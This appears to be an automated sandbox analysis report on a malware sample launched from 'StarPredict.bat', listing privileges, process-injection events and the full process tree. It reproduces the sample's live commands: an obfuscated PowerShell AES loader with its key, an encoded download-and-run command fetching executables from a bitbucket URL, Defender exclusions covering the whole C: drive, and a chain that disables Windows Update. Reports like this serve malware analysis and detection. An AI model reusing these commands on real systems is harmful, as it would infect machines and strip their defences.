Token: SeBackupPrivilege	4732	powershell.exe
Token: SeRestorePrivilege	4732	powershell.exe
Token: SeShutdownPrivilege	4732	powershell.exe
Token: SeDebugPrivilege	4732	powershell.exe
Token: SeSystemEnvironmentPrivilege	4732	powershell.exe
Token: SeRemoteShutdownPrivilege	4732	powershell.exe
Token: SeUndockPrivilege	4732	powershell.exe
Token: SeManageVolumePrivilege	4732	powershell.exe
Token: 33	4732	powershell.exe
Token: 34	4732	powershell.exe
Token: 35	4732	powershell.exe
Token: 36	4732	powershell.exe
Token: SeIncreaseQuotaPrivilege	4732	powershell.exe
Token: SeSecurityPrivilege	4732	powershell.exe
Token: SeTakeOwnershipPrivilege	4732	powershell.exe
Token: SeLoadDriverPrivilege	4732	powershell.exe
Token: SeSystemProfilePrivilege	4732	powershell.exe
Token: SeSystemtimePrivilege	4732	powershell.exe
Token: SeProfSingleProcessPrivilege	4732	powershell.exe
Token: SeIncBasePriorityPrivilege	4732	powershell.exe
Token: SeCreatePagefilePrivilege	4732	powershell.exe
Token: SeBackupPrivilege	4732	powershell.exe
Token: SeRestorePrivilege	4732	powershell.exe
Token: SeShutdownPrivilege	4732	powershell.exe
Token: SeDebugPrivilege	4732	powershell.exe
Token: SeSystemEnvironmentPrivilege	4732	powershell.exe
Token: SeRemoteShutdownPrivilege	4732	powershell.exe
Token: SeUndockPrivilege	4732	powershell.exe
Token: SeManageVolumePrivilege	4732	powershell.exe
Token: 33	4732	powershell.exe
Token: 34	4732	powershell.exe
Token: 35	4732	powershell.exe
Token: 36	4732	powershell.exe
Token: SeIncreaseQuotaPrivilege	4732	powershell.exe
Token: SeSecurityPrivilege	4732	powershell.exe
Token: SeTakeOwnershipPrivilege	4732	powershell.exe
Token: SeLoadDriverPrivilege	4732	powershell.exe
Token: SeSystemProfilePrivilege	4732	powershell.exe
Token: SeSystemtimePrivilege	4732	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

dwm.exe

pid process

4796 dwm.exe

pid	process
4796	dwm.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exeStarPredict.bat.execmd.exepowershell.exeMsPopUp.exeAntiVPS.exeWScript.execmd.execmd.execmd.exe

description	pid	process	target process
PID 816 wrote to memory of 4216	816	cmd.exe	net.exe
PID 816 wrote to memory of 4216	816	cmd.exe	net.exe
PID 4216 wrote to memory of 1624	4216	net.exe	net1.exe
PID 4216 wrote to memory of 1624	4216	net.exe	net1.exe
PID 816 wrote to memory of 4924	816	cmd.exe	StarPredict.bat.exe
PID 816 wrote to memory of 4924	816	cmd.exe	StarPredict.bat.exe
PID 4924 wrote to memory of 4184	4924	StarPredict.bat.exe	powershell.exe
PID 4924 wrote to memory of 4184	4924	StarPredict.bat.exe	powershell.exe
PID 4924 wrote to memory of 4560	4924	StarPredict.bat.exe	cmd.exe
PID 4924 wrote to memory of 4560	4924	StarPredict.bat.exe	cmd.exe
PID 4560 wrote to memory of 400	4560	cmd.exe	choice.exe
PID 4560 wrote to memory of 400	4560	cmd.exe	choice.exe
PID 4184 wrote to memory of 212	4184	powershell.exe	powershell.exe
PID 4184 wrote to memory of 212	4184	powershell.exe	powershell.exe
PID 4560 wrote to memory of 4316	4560	cmd.exe	attrib.exe
PID 4560 wrote to memory of 4316	4560	cmd.exe	attrib.exe
PID 4184 wrote to memory of 3828	4184	powershell.exe	AntiVm.exe
PID 4184 wrote to memory of 3828	4184	powershell.exe	AntiVm.exe
PID 4184 wrote to memory of 3828	4184	powershell.exe	AntiVm.exe
PID 4184 wrote to memory of 3468	4184	powershell.exe	AntiVPS.exe
PID 4184 wrote to memory of 3468	4184	powershell.exe	AntiVPS.exe
PID 4184 wrote to memory of 3468	4184	powershell.exe	AntiVPS.exe
PID 4184 wrote to memory of 3632	4184	powershell.exe	MsPopUp.exe
PID 4184 wrote to memory of 3632	4184	powershell.exe	MsPopUp.exe
PID 3632 wrote to memory of 4688	3632	MsPopUp.exe	powershell.exe
PID 3632 wrote to memory of 4688	3632	MsPopUp.exe	powershell.exe
PID 3468 wrote to memory of 5068	3468	AntiVPS.exe	WScript.exe
PID 3468 wrote to memory of 5068	3468	AntiVPS.exe	WScript.exe
PID 3468 wrote to memory of 5068	3468	AntiVPS.exe	WScript.exe
PID 5068 wrote to memory of 4556	5068	WScript.exe	cmd.exe
PID 5068 wrote to memory of 4556	5068	WScript.exe	cmd.exe
PID 5068 wrote to memory of 4556	5068	WScript.exe	cmd.exe
PID 4556 wrote to memory of 2792	4556	cmd.exe	Perfmonitor.exe
PID 4556 wrote to memory of 2792	4556	cmd.exe	Perfmonitor.exe
PID 3632 wrote to memory of 3896	3632	MsPopUp.exe	cmd.exe
PID 3632 wrote to memory of 3896	3632	MsPopUp.exe	cmd.exe
PID 3632 wrote to memory of 3064	3632	MsPopUp.exe	cmd.exe
PID 3632 wrote to memory of 3064	3632	MsPopUp.exe	cmd.exe
PID 3896 wrote to memory of 3644	3896	cmd.exe	sc.exe
PID 3896 wrote to memory of 3644	3896	cmd.exe	sc.exe
PID 3896 wrote to memory of 2412	3896	cmd.exe	powershell.exe
PID 3896 wrote to memory of 2412	3896	cmd.exe	powershell.exe
PID 3064 wrote to memory of 1004	3064	cmd.exe	powercfg.exe
PID 3064 wrote to memory of 1004	3064	cmd.exe	powercfg.exe
PID 3896 wrote to memory of 4736	3896	cmd.exe	sc.exe
PID 3896 wrote to memory of 4736	3896	cmd.exe	sc.exe
PID 3064 wrote to memory of 4956	3064	cmd.exe	powercfg.exe
PID 3064 wrote to memory of 4956	3064	cmd.exe	powercfg.exe
PID 3632 wrote to memory of 4732	3632	MsPopUp.exe	powershell.exe
PID 3632 wrote to memory of 4732	3632	MsPopUp.exe	powershell.exe
PID 3896 wrote to memory of 3868	3896	cmd.exe	sc.exe
PID 3896 wrote to memory of 3868	3896	cmd.exe	sc.exe
PID 3064 wrote to memory of 4256	3064	cmd.exe	powercfg.exe
PID 3064 wrote to memory of 4256	3064	cmd.exe	powercfg.exe
PID 3064 wrote to memory of 1424	3064	cmd.exe	powercfg.exe
PID 3064 wrote to memory of 1424	3064	cmd.exe	powercfg.exe
PID 3896 wrote to memory of 1480	3896	cmd.exe	sc.exe
PID 3896 wrote to memory of 1480	3896	cmd.exe	sc.exe
PID 3896 wrote to memory of 2640	3896	cmd.exe	reg.exe
PID 3896 wrote to memory of 2640	3896	cmd.exe	reg.exe
PID 3896 wrote to memory of 3608	3896	cmd.exe	reg.exe
PID 3896 wrote to memory of 3608	3896	cmd.exe	reg.exe
PID 3896 wrote to memory of 3636	3896	cmd.exe	reg.exe
PID 3896 wrote to memory of 3636	3896	cmd.exe	reg.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

4316 attrib.exe

pid	process
4316	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\StarPredict.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:816

C:\Windows\system32\net.exe
net file
2⤵
- Suspicious use of WriteProcessMemory
PID:4216

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
3⤵
PID:1624

C:\Users\Admin\AppData\Local\Temp\StarPredict.bat.exe
"StarPredict.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $GjTPU = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\StarPredict.bat').Split([Environment]::NewLine);foreach ($uNHWF in $GjTPU) { if ($uNHWF.StartsWith(':: ')) { $fykia = $uNHWF.Substring(3); break; }; };$uYWwg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($fykia);$bteIa = New-Object System.Security.Cryptography.AesManaged;$bteIa.Mode = [System.Security.Cryptography.CipherMode]::CBC;$bteIa.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$bteIa.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pM/twRvK9SA5xzjGwNEJ2Q5d0efpPNEUzZ/Iw3rJnZU=');$bteIa.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('J7jeqD28Rdq8eM7GGIHP4A==');$krlZA = $bteIa.CreateDecryptor();$uYWwg = $krlZA.TransformFinalBlock($uYWwg, 0, $uYWwg.Length);$krlZA.Dispose();$bteIa.Dispose();$fhTMd = New-Object System.IO.MemoryStream(, $uYWwg);$oPqJI = New-Object System.IO.MemoryStream;$RrChu = New-Object System.IO.Compression.GZipStream($fhTMd, [IO.Compression.CompressionMode]::Decompress);$RrChu.CopyTo($oPqJI);$RrChu.Dispose();$fhTMd.Dispose();$oPqJI.Dispose();$uYWwg = $oPqJI.ToArray();$XDsYK = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($uYWwg);$CBJiO = $XDsYK.EntryPoint;$CBJiO.Invoke($null, (, [string[]] ('')))
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAegB5ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGgAdwB2ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBNAC8AVgBQAFMAIABpAHMAIABhAGwAbABvAHcAZQBkACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHQAdgBhACMAPgA7ACIAOwA8ACMAZQBwAGwAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBtAGwAZAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBkAHAAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwByAGkAcAAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGwAdQBjAGkAZgBlAHIANgAxAC8AbgBlAHcAdABlAHMAdAA4ADEANwA0AC8AcgBhAHcALwA3AGYAOQBkAGIAZQAxADIAOQA4AGIAYgA4AGMAMgAzADUAMgBjAGIAMQA4ADcAOAAwADMAOAA2ADAAZgBkAGIAMgBlADMAZAA2ADQAYwBmAC8AYgBsAG8AbwBkAGUAeQAuAGUAeABlACcALAAgADwAIwBhAHUAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAbgB3ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGcAYQBiACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAbgB0AGkAVgBtAC4AZQB4AGUAJwApACkAPAAjAHUAZQBjACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGYAZQByADYAMQAvAG4AZQB3AHQAZQBzAHQAOAAxADcANAAvAHIAYQB3AC8ANwBmADkAZABiAGUAMQAyADkAOABiAGIAOABjADIAMwA1ADIAYwBiADEAOAA3ADgAMAAzADgANgAwAGYAZABiADIAZQAzAGQANgA0AGMAZgAvAGsAbABzAHQAZQBzAHQALgBlAHgAZQAnACwAIAA8ACMAcQB0AHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBtAGIAbgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB0AHEAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBBAG4AdABpAFYAUABTAC4AZQB4AGUAJwApACkAPAAjAHUAZgB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGYAZQByADYAMQAvAG4AZQB3AHQAZQBzAHQAOAAxADcANAAvAHIAYQB3AC8ANwBmADkAZABiAGUAMQAyADkAOABiAGIAOABjADIAMwA1ADIAYwBiADEAOAA3ADgAMAAzADgANgAwAGYAZABiADIAZQAzAGQANgA0AGMAZgAvAG0AaQBtAGkAbQBpAC4AZQB4AGUAJwAsACAAPAAjAGUAcAB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeAB0AHcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBhAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATQBzAFAAbwBwAFUAcAAuAGUAeABlACcAKQApADwAIwBmAGgAdgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwByAGUAYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBuAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQQBuAHQAaQBWAG0ALgBlAHgAZQAnACkAPAAjAGQAdgBoACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAagBqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBjAG4AcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBBAG4AdABpAFYAUABTAC4AZQB4AGUAJwApADwAIwBuAGkAdQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAGoAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYQBqAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATQBzAFAAbwBwAFUAcAAuAGUAeABlACcAKQA8ACMAaQBuAGsAIwA+AA=="
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#hwv#>[System.Windows.Forms.MessageBox]::Show('No VM/VPS is allowed!','','OK','Error')<#tva#>;
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:212

C:\Users\Admin\AppData\Local\Temp\AntiVm.exe
"C:\Users\Admin\AppData\Local\Temp\AntiVm.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3828

C:\Users\Admin\AppData\Local\Temp\AntiVPS.exe
"C:\Users\Admin\AppData\Local\Temp\AntiVPS.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3468

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\portsurrogateproviderIntobroker\awAKE47kYYMqOatV6.vbe"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5068

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\portsurrogateproviderIntobroker\vEQKeu.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:4556

C:\portsurrogateproviderIntobroker\Perfmonitor.exe
"C:\portsurrogateproviderIntobroker\Perfmonitor.exe"
7⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:4800

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:5112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:2236

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:1368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:4080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/portsurrogateproviderIntobroker/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:4084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:1848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:3132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:1552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
8⤵
PID:4916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:2508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
8⤵
PID:3244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:4500

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\0Pv27slA2J.bat"
8⤵
PID:1396

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
9⤵
PID:4868

C:\Recovery\WindowsRE\dwm.exe
"C:\Recovery\WindowsRE\dwm.exe"
9⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4796

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6e0569eb-11ce-4b3f-a813-139d2af23251.vbs"
10⤵
PID:224

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d553621c-9645-4810-9af7-19d4dfac18bb.vbs"
10⤵
PID:3484

C:\Users\Admin\AppData\Local\Temp\MsPopUp.exe
"C:\Users\Admin\AppData\Local\Temp\MsPopUp.exe"
4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcQB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeAB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBuAGgAcQBrACMAPgAgAEAAKAAgADwAIwBtAHcAdAAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAaQBqAGEAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAbABkAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgBlAGcAIwA+AA=="
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4688

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of WriteProcessMemory
PID:3064

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1004

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4956

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4256

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1424

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
- Suspicious use of WriteProcessMemory
PID:3896

C:\Windows\system32\sc.exe
sc stop UsoSvc
6⤵
- Launches sc.exe
PID:3644

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:2412

C:\Windows\system32\sc.exe
sc stop wuauserv
6⤵
- Launches sc.exe
PID:4736

C:\Windows\system32\sc.exe
sc stop bits
6⤵
- Launches sc.exe
PID:3868

C:\Windows\system32\sc.exe
sc stop dosvc
6⤵
- Launches sc.exe
PID:1480

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
6⤵
- Modifies registry key
PID:2640

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
6⤵
- Modifies registry key
PID:3608

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
6⤵
- Modifies security service
- Modifies registry key
PID:3636

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
6⤵
- Modifies registry key
PID:1452

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
6⤵
- Modifies registry key
PID:524

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2760

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4604

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1452

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1568

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:3012

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1156

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
6⤵
PID:1568

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
6⤵
PID:3640

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
6⤵
PID:3416

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
6⤵
PID:5040

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
6⤵
PID:3016

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
6⤵
PID:5088

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
6⤵
PID:3504

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
